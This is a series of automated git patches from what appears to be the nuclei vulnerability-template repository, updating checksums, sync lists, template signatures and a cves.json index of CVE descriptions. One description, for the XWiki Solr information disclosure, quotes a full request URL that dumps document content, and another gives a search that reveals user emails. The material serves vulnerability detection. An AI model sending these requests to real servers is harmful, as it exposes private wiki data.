http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 http/default-logins/mofi/mofi4500-default-login.yaml:506eeab67f08aebd2f946b5c253936b4a2fac05c @@ -7088,7 +7089,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:e57b35fad18d333e4166fc5eeaf03d6d058d2f7d +http/technologies/waf-detect.yaml:1fca6289adeea30092957bb876f80dab36b8ca8d http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -8665,7 +8666,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9dff0eb24e0b63323acdafd9cbc118266c627c88 +templates-checksum.txt:67bad592efa07db8c99dff2c30b5509c94dcd630 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3ff4e147701344737a273eceefabcbd813eef121 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:28:55 +0000 Subject: [PATCH 0381/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 278579d16c..a4e16bc8bc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' + - 'http/cves/2024/CVE-2024-31982.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-3274.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' From 2eb73069c7fcbe5be9a6a06f9c70b879fc00011e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:28:57 +0000 Subject: [PATCH 0382/1841] Auto Generated Templates Checksum [Tue Jun 18 17:28:57 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3bae0c9aff..6a131eb9f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,6 +3217,7 @@ http/cves/2023/CVE-2023-4974.yaml:903173457ec36bc7a21422fa82994faba8b2dbe1 http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 http/cves/2023/CVE-2023-5003.yaml:4f800fa6ab1df2267322e0b1527e8c7a09829769 http/cves/2023/CVE-2023-50290.yaml:33c022c45e47628e6c1f7865bd10b4dc28c4e37b +http/cves/2023/CVE-2023-50720.yaml:9ee7acb29dea66096e2631377c6353f81d34e998 http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba @@ -8666,7 +8667,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:67bad592efa07db8c99dff2c30b5509c94dcd630 +templates-checksum.txt:32534ba15a865bf1d4833f3f9e57237b8a0c5a6c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 718a3f66442a7bfed5a53e9d34bd535256cb9743 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:29:20 +0000 Subject: [PATCH 0383/1841] Auto Generated New Template Addition List [Tue Jun 18 17:29:20 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 9112576399..9699e7b7ff 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,8 @@ http/cves/2023/CVE-2023-32068.yaml http/cves/2023/CVE-2023-37645.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml +http/cves/2023/CVE-2023-50719.yaml +http/cves/2023/CVE-2023-50720.yaml http/cves/2023/CVE-2023-51449.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml From 397bbcbf03e193288cabd6251c1ae72219dc7d71 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:29:57 +0000 Subject: [PATCH 0384/1841] Auto Generated New Template Addition List [Tue Jun 18 17:29:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9699e7b7ff..2431224049 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-32068.yaml http/cves/2023/CVE-2023-37645.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml +http/cves/2023/CVE-2023-48241.yaml http/cves/2023/CVE-2023-50719.yaml http/cves/2023/CVE-2023-50720.yaml http/cves/2023/CVE-2023-51449.yaml From 529523b6b89b7bd30c03a682b84a01f78509293d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:30:02 +0000 Subject: [PATCH 0385/1841] Auto Generated Templates Checksum [Tue Jun 18 17:30:02 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6a131eb9f4..0b103bb8d9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3208,6 +3208,7 @@ http/cves/2023/CVE-2023-47246.yaml:6cbc4ea372ee4b2b9bd59c9d7a88933946d4eb45 http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 +http/cves/2023/CVE-2023-48241.yaml:ef37b345681568fba006661e483b5a933d55aa1e http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -3217,6 +3218,7 @@ http/cves/2023/CVE-2023-4974.yaml:903173457ec36bc7a21422fa82994faba8b2dbe1 http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 http/cves/2023/CVE-2023-5003.yaml:4f800fa6ab1df2267322e0b1527e8c7a09829769 http/cves/2023/CVE-2023-50290.yaml:33c022c45e47628e6c1f7865bd10b4dc28c4e37b +http/cves/2023/CVE-2023-50719.yaml:e573b0b557dca2c2b36c63d85092a4c8cc6f0f4f http/cves/2023/CVE-2023-50720.yaml:9ee7acb29dea66096e2631377c6353f81d34e998 http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f @@ -8667,7 +8669,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:32534ba15a865bf1d4833f3f9e57237b8a0c5a6c +templates-checksum.txt:8175e2627f928b2acba1933e7b34ddd4a01dc4bb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 87134c3dac412de33c8a94cccfa089b603470487 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:30:04 +0000 Subject: [PATCH 0386/1841] Auto Template Signing [Tue Jun 18 17:30:04 UTC 2024] :robot: --- http/cves/2023/CVE-2023-37645.yaml | 1 + http/cves/2024/CVE-2024-0939.yaml | 1 + http/cves/2024/CVE-2024-31982.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml index 07aca4e59d..10ed9da63a 100644 --- a/http/cves/2023/CVE-2023-37645.yaml +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220620da377352c608f59801114789cee026e742c72f94cc0583128ca38ab31e2e4022021626755b2037d0e95080ef1d8bd13f1418bdafec82dccfeeab84038aa666f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0939.yaml b/http/cves/2024/CVE-2024-0939.yaml index 7d242e4f1b..cf4110bf7c 100644 --- a/http/cves/2024/CVE-2024-0939.yaml +++ b/http/cves/2024/CVE-2024-0939.yaml @@ -67,3 +67,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f291cb43453d52ed8ea93dd7f0da7536ca143002415d5b4f871acc918dc3d67402210090761906ceef6af1de7843f1ac567910f35fc49edf1da7d451ffdcd47ca2e42c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31982.yaml b/http/cves/2024/CVE-2024-31982.yaml index d2b4aef227..2a9c172b6f 100644 --- a/http/cves/2024/CVE-2024-31982.yaml +++ b/http/cves/2024/CVE-2024-31982.yaml @@ -46,3 +46,4 @@ http: - 'contains(header, "text/javascript")' - 'status_code == 200' condition: and +# digest: 490a0046304402206ca80433a32e2a6efa19df74d8ed4c1c6c9c29e76a031d639cd2e448d4fc37f002204cc55c53dc9d7eaf53d15cd3026a2df29c35fde224502778643de5a50d58fc6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb3c14c7b344184a68d707bb3423b4c932bc70f7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:30:05 +0000 Subject: [PATCH 0387/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a4e16bc8bc..5ad5f863c3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,8 @@ on: - 'http/cves/2023/CVE-2023-37645.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' + - 'http/cves/2023/CVE-2023-50719.yaml' + - 'http/cves/2023/CVE-2023-50720.yaml' - 'http/cves/2023/CVE-2023-51449.yaml' - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' From 08278d4e30a40b2f35e4ef671c52f9b888bd1775 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:30:45 +0000 Subject: [PATCH 0388/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5ad5f863c3..cd720358dd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2023/CVE-2023-37645.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' + - 'http/cves/2023/CVE-2023-48241.yaml' - 'http/cves/2023/CVE-2023-50719.yaml' - 'http/cves/2023/CVE-2023-50720.yaml' - 'http/cves/2023/CVE-2023-51449.yaml' From 418ef50071a42aac8c967379515176dbd78050cc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:32:51 +0000 Subject: [PATCH 0389/1841] Auto Generated Templates Checksum [Tue Jun 18 17:32:51 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0b103bb8d9..8eac5d3a01 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3106,7 +3106,7 @@ http/cves/2023/CVE-2023-37462.yaml:6b1f3970c1dc620fcedbcc081ecce0f3328b4e1f http/cves/2023/CVE-2023-37474.yaml:a6565d9a008a046e497384b2e3c54f2665ab21ce http/cves/2023/CVE-2023-37580.yaml:d81689caa2503f8ddaa833303e77e7d22e16d4d0 http/cves/2023/CVE-2023-37629.yaml:6b9aba73f2319467150cfdfb282cfb95d271174b -http/cves/2023/CVE-2023-37645.yaml:cc8d012c1a024cdac3dd2b43da630afe475a8e89 +http/cves/2023/CVE-2023-37645.yaml:e9ab196be4e3ceb35bb8d5d49139fb52d6dd611a http/cves/2023/CVE-2023-3765.yaml:76901ccd6f1bd5832e4e665fa7253eed60353a99 http/cves/2023/CVE-2023-37679.yaml:3fd1560c8134ad5beee7f4c91164a5c38c28dbc8 http/cves/2023/CVE-2023-37728.yaml:00598b29b4b89548b3276da06fbb24bd84c3a748 @@ -3269,7 +3269,7 @@ http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-0939.yaml:dcbc22947fa8b178ff21454caee1f1f229fb150d +http/cves/2024/CVE-2024-0939.yaml:04b5c41f49b6511cf5cf1af97d3d2d1193532833 http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 http/cves/2024/CVE-2024-1061.yaml:96c95b4ca9238cb7c10740394d456ebb9259be24 http/cves/2024/CVE-2024-1071.yaml:c96b9ae1af3c57ad1d76138972e4ef609468f43c @@ -3328,7 +3328,7 @@ http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 -http/cves/2024/CVE-2024-31982.yaml:4983d6aa31324adc1b0090d6e4553f507bd4fd72 +http/cves/2024/CVE-2024-31982.yaml:1c2a20bde3daf605c529fd67b5538084d7cf0f5b http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 @@ -8669,7 +8669,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8175e2627f928b2acba1933e7b34ddd4a01dc4bb +templates-checksum.txt:84a112c3cbe9ded39da858b8b1a66a5dbff9ca1f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 93b4c1fd6b4b69e944bce3ebbccf659608e8ac23 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:34:09 +0000 Subject: [PATCH 0390/1841] Auto Generated cves.json [Tue Jun 18 17:34:09 UTC 2024] :robot: --- cves.json | 11 ++++++++++- cves.json-checksum.txt | 2 +- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 841bf55dd1..e97beebff2 100644 --- a/cves.json +++ b/cves.json @@ -2205,6 +2205,7 @@ {"ID":"CVE-2023-37474","Info":{"Name":"Copyparty \u003c= 1.8.2 - Directory Traversal","Severity":"high","Description":"Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-37474.yaml"} {"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"} {"ID":"CVE-2023-37629","Info":{"Name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","Severity":"critical","Description":"Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37629.yaml"} +{"ID":"CVE-2023-37645","Info":{"Name":"EyouCms v1.6.3 - Information Disclosure","Severity":"medium","Description":"EyouCms v1.6.3 was discovered to contain an information disclosure vulnerability via the component /custom_model_path/recruit.filelist.txt.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-37645.yaml"} {"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"} {"ID":"CVE-2023-37679","Info":{"Name":"NextGen Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37679.yaml"} {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} @@ -2306,6 +2307,7 @@ {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} {"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} +{"ID":"CVE-2023-48241","Info":{"Name":"XWiki \u003c 4.10.15 - Information Disclosure","Severity":"high","Description":"The Solr-based search suggestion provider that also duplicates as generic JavaScript API for search results in XWiki exposes the content of all documents of all wikis to anybody who has access to it, by default it is public. This exposes all information stored in the wiki (but not some protected information like password hashes). While there is a right check normally, the right check can be circumvented by explicitly requesting fields from Solr that don't include the data for the right check. This can be reproduced by opening \u003cxwiki-server\u003e/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain\u0026media=json\u0026nb=1000\u0026query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__\u0026input=+ where \u003cxwiki-server\u003e is the URL of the XWiki installation. If this displays any results, the wiki is vulnerable.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-48241.yaml"} {"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} @@ -2315,6 +2317,8 @@ {"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-5003","Info":{"Name":"Active Directory Integration WP Plugin \u003c 4.1.10 - Log Disclosure","Severity":"high","Description":"The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-5003.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} +{"ID":"CVE-2023-50719","Info":{"Name":"XWiki \u003c 4.10.15 - Sensitive Information Disclosure","Severity":"high","Description":"XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50719.yaml"} +{"ID":"CVE-2023-50720","Info":{"Name":"XWiki \u003c 4.10.15 - Email Disclosure","Severity":"medium","Description":"The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-50720.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} @@ -2364,6 +2368,7 @@ {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} {"ID":"CVE-2024-0881","Info":{"Name":"Combo Blocks \u003c 2.2.76 - Improper Access Control","Severity":"medium","Description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0881.yaml"} +{"ID":"CVE-2024-0939","Info":{"Name":"Smart S210 Management Platform - Arbitary File Upload","Severity":"critical","Description":"A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0939.yaml"} 